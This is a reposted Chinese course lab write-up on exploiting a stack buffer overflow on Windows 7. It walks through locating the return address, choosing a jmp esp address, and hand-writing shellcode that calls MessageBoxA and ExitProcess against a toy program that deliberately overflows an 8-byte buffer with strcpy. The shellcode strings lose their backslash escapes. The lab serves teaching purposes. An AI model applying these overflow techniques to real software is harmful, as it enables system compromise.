测试2

一、实验目的

  1. 熟悉编写shellCode的流程
  2. 掌握缓冲区溢出的利用

二、实验环境

  1. 系统环境:Windows环境
  2. 软件环境:C++ ,缓冲区溢出文件链接

三、实验原理

  1. 要实施一次有效的缓冲区溢出攻击,攻击者必须完成如下任务:
    (1)在程序的地址空间里植入适当的代码(称为shellcode)用于完成获取系统控制权等非法任务。
    (2)通过修改寄存器或内存,让程序执行流跳转到攻击者植入的shellcode地址空间执行。
  2. 在具体实现时,我们通过三个步骤完成缓冲区溢出:
    (1).精确查找返回地址的位置
    (2).查找一个适合的地址用于覆盖原始地址
    (3).编写shellcode到对应的缓冲区
    (4).编写shellcode弹出攻击对话框

四、实验步骤

  • 利用缓冲区溢出漏洞首先需要精确查找到返回地址的位置
    打开Windows7虚拟机,编写一个overrun.dsw工程文件,代码如下所示:
#include "string.h"
#include "stdio.h"
#include "windows.h"	
char name[] = "ABCDEFGH"
			"IJKL"
			"xb3x00x00x00"//填入获取的jmp esp指令地址
			"x33xDB" //xor ebx,ebx
			"x53"     //push ebx  				
			"x68x69x6Ex67x20"//push 0x20676e69
			"x68x57x61x72x6E"//push 0x6e726157				
			"x8BxC4"  //mov eax,esp
			"x53"  //push ebx
			"x68x21x20x20x20"//push 0x20202021
			"x68x63x6bx65x64"//push 0x64656b63
			"x68x6ex20x68x61"//push 0x6168206e
			"x68x20x62x65x65"//push 0x65656220
                        "x68x68x61x76x65"//push 0x65766168
			"x68x59x6fx75x20"//push 0x20756f59
			"x8BxCC" //mov ecx,esp
			"x53"//push ebx
			"x50"//push eax
			"x51"//push ecx
			"x53"//push ebx
			"xb8x00x00x00x00"//MessageBoxA地址赋给eax
			"xFFxD0" //call eax
			"x53" //push ebx
			"xb8x00x00x00x00" //将之前实验获取的ExitProcess函数的地址赋给eax
			"xFFxD0"; //call eax;

	int main()
	{
		char buffer[8];
		LoadLibrary("user32.dll");
		strcpy(buffer,name);
		printf("%sn",buffer);
		getchar();
		return 0;
	}

  • 获取jmp esp 指令地址:
    打开缓冲区溢出文件夹—找到Searchjmp文件夹,加载SearhjmpEsp.dsw文件。运行程序,程序列出jmp esp指令的地址。我们随机选取一个jmp esp的地址,例如:0x75a0a0b3如下图所示:获取jmp esp指令地址

  • 获取对话框函数(注入函数)地址:
    通过漏洞调用MessageBoxA对话框首先要获取相关函数的地址,双击打开缓冲区溢出文件夹—找到Searchjmp文件夹,加载SerchFunctionAddr.dsw文件,运行程序。获取对应函数的地址。函数MessageBoxA的地址为0x759aea11,函数ExitProcess的地址为0x76e0214f。如图2-2-3所示。(修改代码可以获取其他API函数的地址)为了让溢出程序正常关闭,这里我们还获取了ExitProcess函数的地址

  • 将获取jmp esp 指令地址和获取对话框函数(注入函数)地址,替换overrun.cpp文件内的jmp esp指令地址和MessageBoxA和ExitProcess地址

#include "string.h"
#include "stdio.h"
#include "windows.h"	
char name[] = "ABCDEFGH"
			"IJKL"
			"xb3xa0xa0x75"//填入获取的jmp esp指令地址
			"x33xDB" //xor ebx,ebx
			"x53"     //push ebx  				
			"x68x69x6Ex67x20"//push 0x20676e69
			"x68x57x61x72x6E"//push 0x6e726157				
			"x8BxC4"  //mov eax,esp
			"x53"  //push ebx
			"x68x21x20x20x20"//push 0x20202021
			"x68x63x6bx65x64"//push 0x64656b63
			"x68x6ex20x68x61"//push 0x6168206e
			"x68x20x62x65x65"//push 0x65656220
                        "x68x68x61x76x65"//push 0x65766168
			"x68x59x6fx75x20"//push 0x20756f59
			"x8BxCC" //mov ecx,esp
			"x53"//push ebx
			"x50"//push eax
			"x51"//push ecx
			"x53"//push ebx
			"xb8x11xeax9ax75"//MessageBoxA地址赋给eax
			"xFFxD0" //call eax
			"x53" //push ebx
			"xb8x4Fx21xe0x76" //将之前实验获取的ExitProcess函数的地址赋给eax
			"xFFxD0"; //call eax;

	int main()
	{
		char buffer[8];
		LoadLibrary("user32.dll");
		strcpy(buffer,name);
		printf("%sn",buffer);
		getchar();
		return 0;
	}
  • 运行overrun.cpp程序,按下空格,弹出对话框成功。如下图所示:
内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/zovt/p/15396237.html

标签: 网络安全
你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!

相关课程

基于 OpenVINO™ 的 AI 视觉应用进阶课
42053 0元 限免
英特尔 OpenCV 初级认证课程
7736 0元 限免